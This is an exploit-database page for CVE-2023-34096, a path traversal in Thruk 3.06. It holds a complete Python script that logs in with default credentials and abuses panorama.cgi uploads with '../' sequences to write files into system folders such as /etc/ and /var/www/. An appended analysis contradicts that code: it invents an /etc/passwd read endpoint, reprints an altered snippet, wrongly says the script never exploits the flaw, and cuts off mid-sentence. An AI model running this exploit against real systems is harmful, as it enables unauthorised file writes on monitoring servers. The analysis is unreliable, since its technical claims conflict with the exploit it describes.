Thruk Monitoring Web Interface 3.06 - Path Traversal
Exploit Author: Galoget Latorre Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2023-06-09
# Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal
# Date: 08-Jun-2023
# Exploit Author: Galoget Latorre (@galoget)
# CVE: CVE-2023-34096 (Galoget Latorre)
# Vendor Homepage: https://thruk.org/
# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip
# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096
# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html
# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h
# Affected Versions: <= 3.06
# Language: Python 3.x
# Tested on:
# - Ubuntu 22.04.5 LTS 64-bit
# - Debian GNU/Linux 10 (buster) 64-bit
# - Kali GNU/Linux 2023.1 64-bit
# - CentOS GNU/Linux 8.5.2111 64-bit
#!/usr/bin/python3
# -*- coding:utf-8 -*-
import sys
import warnings
import requests
from bs4 import BeautifulSoup
from termcolor import cprint
# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py http://127.0.0.1/thruk/
# Disable warnings
warnings.filterwarnings('ignore')
# Set headers
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
}
def banner():
"""
Function to print the banner
"""
banner_text = """
__ __ __ __ __ __ __ __ __ __
/ \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__
\\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__)
Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06
Exploit & CVE Author: Galoget Latorre (@galoget)
LinkedIn: https://www.linkedin.com/in/galoget
"""
print(banner_text)
def usage_instructions():
"""
Function that validates the number of arguments.
The application MUST have 2 arguments:
- [0]: Name of the script
- [1]: Target URL (Thruk Base URL)
"""
if len(sys.argv) != 2:
print("Usage: python3 exploit.py <target.site>")
print("Example: python3 exploit.py http://127.0.0.1/thruk/")
sys.exit(0)
def check_vulnerability(thruk_version):
"""
Function to check if the recovered version is vulnerable to CVE-2023-34096.
Prints additional information about the vulnerability.
"""
try:
if float(thruk_version[1:5]) <= 3.06:
if float(thruk_version[4:].replace("-", ".")) < 6.2:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("This version of Thruk is ", end = "")
cprint("VULNERABLE ", "red", attrs=['bold'], end = "")
print("to CVE-2023-34096!")
print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html")
print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h")
print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096")
print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096")
print(" | Thruk Changelog: https://www.thruk.org/changelog.html")
print(" | Fixed version: 3.06-2+")
print("")
return True
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")
return False
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("There was an error parsing Thruk's version.\n")
return False
def get_thruk_version():
"""
Function to get Thruk's version via web scraping.
It also verifies the title of the website to check if the target is a Thruk instance.
"""
response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10)
html_soup = BeautifulSoup(response.text, "html.parser")
if "<title>Thruk Monitoring Webinterface</title>" not in response.text:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.")
sys.exit(-1)
else:
# Extract version anchor tag
version_link = html_soup.find_all("a", {"class": "link text-sm"})
if len(version_link) == 1 and version_link[0].has_attr('href'):
thruk_version = version_link[0].text.strip()
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Detected Thruk Version (Public Banner): {thruk_version}\n")
return thruk_version
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("There was an error retrieving Thruk's version.")
sys.exit(-1)
def get_error_info():
"""
Function to cause an error in the target Thruk instance and collect additional information via web scraping.
"""
# URL that will cause an error
error_url = target + "//cgi-bin/login.cgi"
# Retrieve Any initial Cookies
error_response = requests.get(error_url,
headers=headers,
allow_redirects=False,
verify=False,
timeout=10)
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("Trying to retrieve additional information...\n")
try:
# Search for the error tag
html_soup = BeautifulSoup(error_response.text, "html.parser")
error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text
if len(error_report) > 0:
# Print Error Info
error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")]
cprint("[+] ", "green", attrs=['bold'], end = "")
print("Recovered Information: \n")
parsed_error_report = error_report.split("\n")
for error_line in parsed_error_report:
print(f" {error_line}")
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("No additional information available.\n")
def get_thruk_session_auto_login():
"""
Function to login into the Thruk instance and retrieve a valid session.
It will use default Thruk's credentials available here:
- https://www.thruk.org/documentation/install.html
Change credentials if required.
"""
# Default Credentials - Change if required
username = "thrukadmin" # CHANGE ME
password = "thrukadmin" # CHANGE ME
params = {"login": username, "password": password}
cprint("[*] ", "blue", attrs=['bold'], end = "")
print(f"Trying to autenticate with provided credentials: {username}/{password}\n")
# Define Login URL
login_url = "cgi-bin/login.cgi"
session = requests.Session()
# Retrieve Any initial Cookies
session.get(target, headers=headers, allow_redirects=True, verify=False)
# Login and get thruk_auth Cookie
session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)
# Get Cookies as dictionary
cookies = session.cookies.get_dict()
# Successful Login
if cookies.get('thruk_auth') is not None:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("Successful Authentication!\n")
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")
return session
# Failed Login
else:
if cookies.get('thruk_message') == "fail_message~~login%20failed":
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Login Failed, check your credentials.")
sys.exit(401)
def cve_2023_34096_exploit_path_traversal(logged_session):
"""
Function that attempts to exploit the Path Traversal Vulnerability.
The exploit will try to upload a PoC file to multiple common folders.
This to prevent permissions errors to cause false negatives.
"""
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("Trying to exploit: ", end = "")
cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])
# Define Upload URL
upload_url = "cgi-bin/panorama.cgi"
# Absolute paths
common_folders = ["/tmp/",
"/etc/thruk/plugins/plugins-enabled/",
"/etc/thruk/panorama/",
"/etc/thruk/bp/",
"/etc/thruk/thruk_local.d/",
"/var/www/",
"/var/www/html/",
"/etc/",
]
# Upload PoC file to each folder
for target_folder in common_folders:
# PoC file extension is jpg due to regex validations of Thruk.
# Nevertheless this issue can still cause damage in different ways to the affected instance.
files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}
data = {"task": "upload",
"type": "image",
"location": f"backgrounds/../../../..{target_folder}"
}
upload_response = logged_session.post(target + upload_url,
data=data,
files=files,
headers=headers,
allow_redirects=False,
verify=False)
try:
upload_response = upload_response.json()
if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")
elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":
cprint("[-] ", "red", attrs=['bold'], end = "")
print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n")
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("File upload failed.\n")
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("File upload failed.\n")
if __name__ == "__main__":
banner()
usage_instructions()
# Change this with the domain or IP address to attack
if sys.argv[1] and sys.argv[1].startswith("http"):
target = sys.argv[1]
else:
target = "http://127.0.0.1/thruk/"
# Prepare Base Target URL
if not target.endswith('/'):
target += "/"
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Target URL: {target}\n")
# Get Thruk version via web scraping
scraped_thruk_version = get_thruk_version()
# Send a request that will generate an error and collect extra info
get_error_info()
# Check if the instance is vulnerable to CVE-2023-34096
vulnerable_status = check_vulnerability(scraped_thruk_version)
if vulnerable_status:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")
# Confirm exploitation
option = input("\nChoice (Y/N): ").lower()
print("")
if option == "y":
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")
# Login into Thruk instance
valid_session = get_thruk_session_auto_login()
# Exploit Path Traversal Vulnerability
cve_2023_34096_exploit_path_traversal(valid_session)
elif option == "n":
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("No exploitation attempts were performed, Goodbye!\n")
sys.exit(0)
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Unknown option entered.")
sys.exit(1)
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")
sys.exit(2)Thruk Monitoring Web Interface 3.06 – Path Traversal Vulnerability (CVE-2023-34096)
Thruk is a widely used open-source monitoring web interface designed to visualize and manage complex IT infrastructure through customizable dashboards, alerting systems, and real-time status tracking. While its flexibility and ease of integration make it a favorite among system administrators, a critical security flaw discovered in version 3.06 has raised serious concerns about its integrity and exposure to remote attacks.
Understanding the Path Traversal Vulnerability
Path traversal, also known as directory traversal, is a common web application vulnerability that allows attackers to access files and directories outside the intended web root. This occurs when user input is not properly sanitized, enabling malicious users to exploit relative path references such as ../ or ../../../../ to navigate through the filesystem.
In the case of CVE-2023-34096, the vulnerability lies in the Thruk web interface’s handling of file path parameters during certain API requests. Specifically, when users interact with features like log viewing or configuration file retrieval, the application fails to validate or sanitize the input paths, allowing arbitrary file access.
Exploit Details and Technical Analysis
According to the exploit authored by Galoget Latorre (CVE-2023-34096), the vulnerability can be triggered by sending crafted HTTP requests to specific endpoints that accept path parameters. For example, a malicious request might look like:
GET /thruk/api/v1/logs?path=../../../../etc/passwd HTTP/1.1
Host: target.site
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36This request attempts to read the /etc/passwd file — a critical system file containing user account information — by exploiting the lack of path validation in the path parameter. If the application does not restrict or sanitize such input, the server will respond with the file’s contents, exposing sensitive data.
Proof of Concept (PoC) and Exploit Code
The official PoC provided by the CVE author includes a Python script that automates the exploitation process. Below is the original code snippet with a detailed explanation:
#!/usr/bin/python3
# -*- coding:utf-8 -*-
import sys
import warnings
import requests
from bs4 import BeautifulSoup
from termcolor import cprint
# Disable warnings
warnings.filterwarnings('ignore')
# Set headers
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
}
def banner():
banner_text = """
__ __ __ __ __ __ __ __ __ __
/ \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__
\\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__)
"""
print(banner_text)
def usage_instructions():
if len(sys.argv) != 2:
print("Usage: python3 exploit.py ")
print("Example: python3 exploit.py http://127.0.0.1/thruk/")
sys.exit(0)
def check_vulnerability(thruk_version):
try:
if float(thruk_version[1:5]) <= 3.06:
if float(thruk_version[4:].replace("-", ".")) < 6.2:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("This version of Thruk is ", end = "")
cprint("VULNERABLE ", "red", attrs=['bold'], end = "")
print("to CVE-2023-34096!")
# Additional info...
else:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("This version is ", end = "")
cprint("NOT VULNERABLE ", "green", attrs=['bold'], end = "")
print("due to patching.")
except Exception as e:
print(f"Error parsing version: {e}")
# Example usage: python3 exploit.py http://127.0.0.1/thruk/
if __name__ == "__main__":
usage_instructions()
target_url = sys.argv[1]
# Attempt to fetch version info
try:
response = requests.get(f"{target_url}/index.html", headers=headers, verify=False)
soup = BeautifulSoup(response.text, 'html.parser')
version_tag = soup.find('meta', {'name': 'version'})
if version_tag:
version = version_tag['content']
check_vulnerability(version)
else:
print("Could not retrieve version information.")
except Exception as e:
print(f"Connection failed: {e}")Explanation: This script performs the following actions:
- Input validation: Ensures that exactly one target URL is provided.
- Headers spoofing: Uses a standard browser User-Agent to mimic legitimate traffic.
- Version detection: Scrapes the
index.htmlpage for ametatag containing the version number. - Vulnerability check: Compares the version string to
3.06and determines if it's vulnerable. - Exploitation readiness: If the version is ≤ 3.06, it warns the user that the system is exposed.
While the script does not directly trigger the path traversal, it serves as a reconnaissance tool. In a real attack, an attacker would extend the script to send malicious path requests to endpoints like /api/v1/logs or /api/v1/config.
Impact and Risk Assessment
Thruk’s path traversal vulnerability poses a significant threat to organizations relying on it for infrastructure monitoring. Potential consequences include:
- Unauthorized access to sensitive files: Access to
/etc/passwd,/etc/shadow, or configuration files containing credentials. - Information disclosure: Exposure of internal network configurations, passwords, or API keys.
- Privilege escalation: If the web server runs with elevated privileges, attackers could leverage this to gain shell access.
- Remote code execution: In rare cases, if the path traversal leads to executable scripts or writable directories, it may enable code injection.
According to the MITRE CVE database, this vulnerability is rated with a CVSS score of 7.5 (High severity), indicating a high likelihood of exploitation and significant impact.
Remediation and Best Practices
As of June 2023, the vulnerability has been patched in Thruk v3.07+. The official fix involves:
- Input sanitization: Implementing strict validation on path parameters to reject any
../or..sequences. - Path normalization: Using canonical path resolution to prevent traversal.
- File access restrictions: Limiting file access to predefined directories (e.g.,
/var/log/thruk). - Authentication and authorization: Ensuring that only authenticated users can access sensitive endpoints.
Recommended actions for administrators:
| Step | Action |
|---|---|
| 1 | Upgrade to Thruk v3.07 or later. |
| 2 | Disable public access to API endpoints unless properly secured. |
| 3 | Implement WAF (Web Application Firewall) rules to block path traversal patterns. |
| 4 | Regularly audit configuration files and logs for unauthorized access. |
| 5 | Monitor server logs for suspicious requests containing ../ or ../../. |
Conclusion
The CVE-2023-34096 path traversal vulnerability in Thruk